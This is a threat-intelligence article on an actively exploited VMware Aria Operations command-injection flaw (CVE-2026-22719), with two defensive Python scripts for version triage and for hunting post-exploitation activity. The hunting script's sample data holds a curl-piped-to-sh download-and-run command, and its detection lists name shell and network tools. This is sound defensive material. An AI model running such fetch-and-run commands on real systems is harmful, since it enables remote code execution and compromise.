CISA KEV Alert: Actively Exploited VMware Aria Flaw (CVE-2026-22719) Allows Remote Code Execution

CISA Adds Actively Exploited VMware Aria Operations Vulnerability (CVE-2026-22719) to KEV Catalog

Severity: HIGH
Published: March 5, 2026
Categories: Vulnerability, Cloud Security, Patch Management

Related Entities

Products & Tech: VMware Aria Operations, VMware Cloud Foundation

CVE Identifiers: CVE-2026-22719 (HIGH, CVSS 8.1)

Executive Summary

On March 3, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-22719, a high-severity vulnerability in VMware Aria Operations, to its Known Exploited Vulnerabilities (KEV) catalog, which signals confirmed exploitation in the wild. The flaw is a command injection issue that an unauthenticated attacker with network access to the appliance can use to execute arbitrary commands as root. Exploitation requires a specific condition (a product migration must be in progress), but the absence of any authentication requirement and the root-level impact make it a significant threat. Broadcom, VMware's parent company, has released patches and a workaround, and administrators are strongly urged to act immediately.

Vulnerability Details

CVE-2026-22719 is a command injection vulnerability with a CVSS v3 base score of 8.1. It exists in the logic that handles product migrations. An unauthenticated attacker who can reach the appliance over the network can send a crafted request that injects and executes arbitrary commands. A successful exploit grants root-level access to the Aria Operations appliance.

A key prerequisite for exploitation is that a support-assisted product migration must be underway. While this narrows the window of opportunity, the fact that it is being exploited in the wild suggests attackers have found ways to either trigger this condition or identify targets already in this state.

Affected Systems

The vulnerability affects the following products:

  • VMware Aria Operations (versions prior to 8.18.6)
  • VMware Cloud Foundation (versions prior to 9.0.2.0)
  • VMware vSphere Foundation (versions prior to 9.0.2.0)

Exploitation Status

Broadcom first disclosed the vulnerability on February 24, 2026. On March 3, CISA added it to the KEV catalog, which is official confirmation of active, in-the-wild exploitation. Details of the attacks are not public, but under Binding Operational Directive 22-01 the KEV listing obligates U.S. federal civilian agencies to remediate the flaw by the due date given in the catalog entry, and it serves as a strong warning to all other organizations.

Impact Assessment

Compromising a VMware Aria Operations appliance provides an attacker with a powerful foothold inside a victim's network. Aria Operations is deeply integrated with the vSphere environment, giving it visibility and control over the entire virtual infrastructure. An attacker with root access to this appliance could potentially:

  • Steal credentials for vCenter, ESXi hosts, and other systems.
  • Gain a comprehensive understanding of the network topology and virtual machine inventory.
  • Pivot to other systems within the virtual environment.
  • Deploy ransomware or exfiltrate sensitive data from virtual machines.

Cyber Observables for Detection

To hunt for potential exploitation, security teams should focus on:

  • log_source: Aria Operations appliance logs. Monitor for entries related to migration activity that coincide with anomalous command execution or network connections.
  • process_name: bash, sh, curl, wget. Look for unexpected shell processes or network utilities being executed by the Aria Operations service account.
  • network_traffic_pattern: unusual outbound traffic from the Aria appliance. Monitor for connections to unknown or known-malicious IP addresses, which could indicate C2 communication or data exfiltration.

Detection Methods

  1. Version Scanning: Identify all instances of VMware Aria Operations and related products in your environment and check their versions against the patched versions.
  2. Log Analysis: Scrutinize appliance system logs and application logs for any errors or unusual entries related to the migration service. Correlate these with network logs to identify suspicious inbound connections during the same timeframe. This applies D3FEND's Process Analysis (D3-PA).
  3. Integrity Monitoring: Monitor for unexpected changes to critical system files or configurations on the Aria Operations appliance.
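The version-scanning step above is where a string comparison quietly fails: "8.18.10" sorts before "8.18.6" as text, and "9.0.2" does not equal "9.0.2.0". The following script is an added example written for this article (it is not Broadcom's tooling) that triages a product inventory against the fixed versions listed in Affected Systems using numeric, component-wise comparison. The inventory, hostnames and the version "8.18.10" are constructed for illustration; products the advisory does not cover are reported as unassessed rather than dropped, so a mislabelled CMDB entry cannot hide an unpatched appliance.

```python
"""Version triage for CVE-2026-22719 across a product inventory.

Added example for this article (not Broadcom's tooling). Fixed versions are
the ones listed in the Affected Systems section; the inventory is constructed.
"""
from typing import Dict, List, Tuple

# First fixed versions, as listed in the Affected Systems section.
FIXED_VERSIONS: Dict[str, str] = {
    "VMware Aria Operations": "8.18.6",
    "VMware Cloud Foundation": "9.0.2.0",
    "VMware vSphere Foundation": "9.0.2.0",
}

# Constructed inventory: hostnames and versions are made up for illustration.
SAMPLE_INVENTORY: List[Dict[str, str]] = [
    {"host": "aria-ops-01.example.internal", "product": "VMware Aria Operations", "version": "8.18.3"},
    {"host": "aria-ops-02.example.internal", "product": "VMware Aria Operations", "version": "8.18.6"},
    {"host": "aria-ops-03.example.internal", "product": "VMware Aria Operations", "version": "8.18.10"},
    {"host": "vcf-mgmt-01.example.internal", "product": "VMware Cloud Foundation", "version": "9.0.1.0"},
    {"host": "vsf-mgmt-01.example.internal", "product": "VMware vSphere Foundation", "version": "9.0.2"},
    {"host": "vcenter-01.example.internal", "product": "VMware vCenter Server", "version": "8.0.3"},
]


def parse_version(version: str) -> Tuple[int, ...]:
    """'8.18.6' -> (8, 18, 6). A component such as '6a' is reduced to its
    leading digits; an empty or non-numeric component becomes 0."""
    parts = []
    for piece in version.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def version_lt(a: str, b: str) -> bool:
    """True if version a is strictly older than version b.
    Tuples are zero-padded to equal length so '9.0.2' == '9.0.2.0'."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    pa += (0,) * (width - len(pa))
    pb += (0,) * (width - len(pb))
    return pa < pb


def is_vulnerable(product: str, version: str) -> bool:
    """True if the version is below the first fixed version for the product.
    Raises KeyError for products the advisory does not cover."""
    return version_lt(version, FIXED_VERSIONS[product])


def triage(inventory: List[Dict[str, str]]) -> Dict[str, List[Dict[str, str]]]:
    """Split an inventory into vulnerable, patched and unassessed entries.
    Unknown products are surfaced, not silently skipped."""
    result: Dict[str, List[Dict[str, str]]] = {"vulnerable": [], "patched": [], "unassessed": []}
    for item in inventory:
        product = item["product"]
        if product not in FIXED_VERSIONS:
            result["unassessed"].append(item)
        elif is_vulnerable(product, item["version"]):
            result["vulnerable"].append({**item, "fixed_in": FIXED_VERSIONS[product]})
        else:
            result["patched"].append(item)
    return result


if __name__ == "__main__":
    report = triage(SAMPLE_INVENTORY)
    for entry in report["vulnerable"]:
        print(f'PATCH NOW  {entry["host"]}: {entry["product"]} {entry["version"]} (fixed in {entry["fixed_in"]})')
    for entry in report["unassessed"]:
        print(f'UNASSESSED {entry["host"]}: {entry["product"]} is not covered by this advisory')
```

Feed it the product/version pairs exported from your CMDB or from the appliance management interfaces; the "unassessed" list is worth reviewing by hand, since a product recorded under a slightly different name would otherwise escape the check.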

Remediation Steps

  1. Apply Updates: The primary remediation is to update to a patched version of the affected software (e.g., VMware Aria Operations 8.18.6 or newer). This is a direct implementation of M1051 - Update Software.
  2. Use Workaround: If immediate patching is not feasible, Broadcom has provided a workaround script. This script should be obtained directly from the official VMware support site and applied according to their instructions.
  3. Network Controls: Restrict network access to the Aria Operations appliance. Ensure it is not exposed to the internet and is only accessible from trusted management segments of the network, as recommended by M1035 - Limit Access to Resource Over Network.

Timeline of Events

  1. February 24, 2026: Broadcom discloses CVE-2026-22719 in VMware Aria Operations.
  2. March 3, 2026: CISA adds CVE-2026-22719 to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation.
  3. March 5, 2026: This article is published.

MITRE ATT&CK Mitigations

  • M1051 - Update Software: The primary mitigation is to apply the security updates provided by Broadcom/VMware.
  • M1035 - Limit Access to Resource Over Network: Restrict network access to the VMware Aria Operations appliance from untrusted networks to reduce the attack surface.
  • M1047 - Audit: Regularly audit system logs and monitor for anomalous process execution to detect signs of compromise.

D3FEND Defensive Countermeasures

Given that CVE-2026-22719 is confirmed to be actively exploited, the most urgent and effective defensive action is to apply the software updates provided by Broadcom. Organizations should immediately identify all instances of VMware Aria Operations, VMware Cloud Foundation, and VMware vSphere Foundation in their environments and upgrade them to the patched versions (e.g., Aria Operations 8.18.6+). Due to the KEV status, this should be treated as an emergency change. For organizations unable to patch immediately, applying the official workaround script from VMware is a critical compensating control, but should be considered a temporary measure until the full update can be deployed. This action directly closes the vulnerability, preventing attackers from using this specific vector for command injection.

To detect potential exploitation of CVE-2026-22719 or similar command injection flaws, security teams should implement robust process analysis on their VMware Aria Operations appliances. This involves establishing a baseline of normal running processes and their parent-child relationships. An EDR agent or a host-based intrusion detection system (HIDS) should be configured to monitor for anomalous process creation events. Specifically, look for the main Aria Operations service process spawning unexpected shells like sh, bash, or command-line utilities such as curl, wget, nc. Since the exploit grants root privileges, any such activity from the service's user context is highly suspicious. Correlating these process events with network logs showing unusual outbound connections from the appliance can provide high-fidelity alerts indicative of a successful compromise.
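The Cyber Observables table and the process-analysis guidance above describe one hunt: the Aria Operations service process spawning a shell or download tool, running as root, followed by an unexplained outbound connection. The script below is an added example written for this article (it is not Broadcom's tooling and does not use a real Aria log format) that implements that hunt over process-creation and network events as an EDR or HIDS agent might export them. The event schema, the service process name "aria-ops-service", the destination allowlist and all sample events are assumptions constructed for illustration; the 198.51.100.0/24 address is from a documentation range.

```python
"""Hunt for post-exploitation of CVE-2026-22719 on an Aria Operations appliance.

Added example for this article (not Broadcom's tooling, not a real Aria log
format). Flags the service process spawning a shell or download tool, raises
severity when the child runs as root, and escalates further when an outbound
connection to a non-allowlisted destination follows within a short window.
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Assumption: the name of the Aria Operations service process as seen by the
# agent. Take this from a baseline of your own appliance, not from this file.
SERVICE_PROCESS = "aria-ops-service"
# Children the service process has no business spawning.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat"}
# Assumption: destinations the appliance legitimately talks to (vCenter,
# ESXi hosts, update repositories). Replace with your own allowlist.
ALLOWED_DESTINATIONS = {"10.0.0.5", "10.0.0.6"}
# How long after a suspicious spawn an outbound connection is still correlated.
CORRELATION_WINDOW = timedelta(minutes=5)

# Constructed events in JSON-lines form; none of these come from a real host.
SAMPLE_EVENTS = """
{"type": "process", "ts": "2026-03-04T02:15:07Z", "pid": 4201, "parent": "aria-ops-service", "name": "bash", "uid": 0, "cmdline": "bash -c 'curl http://198.51.100.23/m.sh | sh'"}
{"type": "network", "ts": "2026-03-04T02:15:09Z", "pid": 4203, "dst": "198.51.100.23", "dport": 80}
{"type": "network", "ts": "2026-03-04T02:15:10Z", "pid": 1187, "dst": "10.0.0.5", "dport": 443}
{"type": "process", "ts": "2026-03-04T02:16:00Z", "pid": 4210, "parent": "cron", "name": "sh", "uid": 0, "cmdline": "sh -c /opt/scripts/logrotate.sh"}
{"type": "process", "ts": "2026-03-04T02:30:00Z", "pid": 4301, "parent": "aria-ops-service", "name": "python3", "uid": 1000, "cmdline": "python3 /opt/collector/run.py"}
{"type": "process", "ts": "2026-03-04T02:40:00Z", "pid": 4402, "parent": "aria-ops-service", "name": "curl", "uid": 1000, "cmdline": "curl -s https://10.0.0.6/api/health"}
"""


def parse_events(lines) -> List[Dict]:
    """Parse JSON-lines events, convert timestamps, and sort by time."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def hunt(lines) -> List[Dict]:
    """Return one alert per suspicious child of the service process."""
    events = parse_events(lines)
    connections = [e for e in events if e["type"] == "network"]
    alerts = []
    for proc in (e for e in events if e["type"] == "process"):
        if proc["parent"] != SERVICE_PROCESS or proc["name"] not in SUSPICIOUS_CHILDREN:
            continue
        alert = {
            "ts": proc["ts"].isoformat(),
            "pid": proc["pid"],
            "process": proc["name"],
            "cmdline": proc["cmdline"],
            "uid": proc["uid"],
            # The exploit yields root, so a root-owned child is the stronger signal.
            "severity": "high" if proc["uid"] == 0 else "medium",
            "correlated_connections": [],
        }
        # Correlate on time rather than on pid: the shell usually hands off to
        # a child (curl, wget) with its own pid, so a pid join would miss it.
        deadline = proc["ts"] + CORRELATION_WINDOW
        for conn in connections:
            if proc["ts"] <= conn["ts"] <= deadline and conn["dst"] not in ALLOWED_DESTINATIONS:
                alert["correlated_connections"].append(f'{conn["dst"]}:{conn["dport"]}')
        if alert["correlated_connections"]:
            alert["severity"] = "critical"
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS.splitlines()):
        print(json.dumps(alert))
```

On the constructed sample this yields two alerts: the root bash spawn becomes critical once the connection to 198.51.100.23 lands inside the window, while the later curl to an allowlisted vCenter address stays at medium. That medium tier is where baseline tuning belongs: if the service legitimately shells out to curl on your appliance, add that exact command line to an exclusion rather than widening the allowlist.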


Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

CISA KEV, command injection, virtualization, Broadcom, RCE
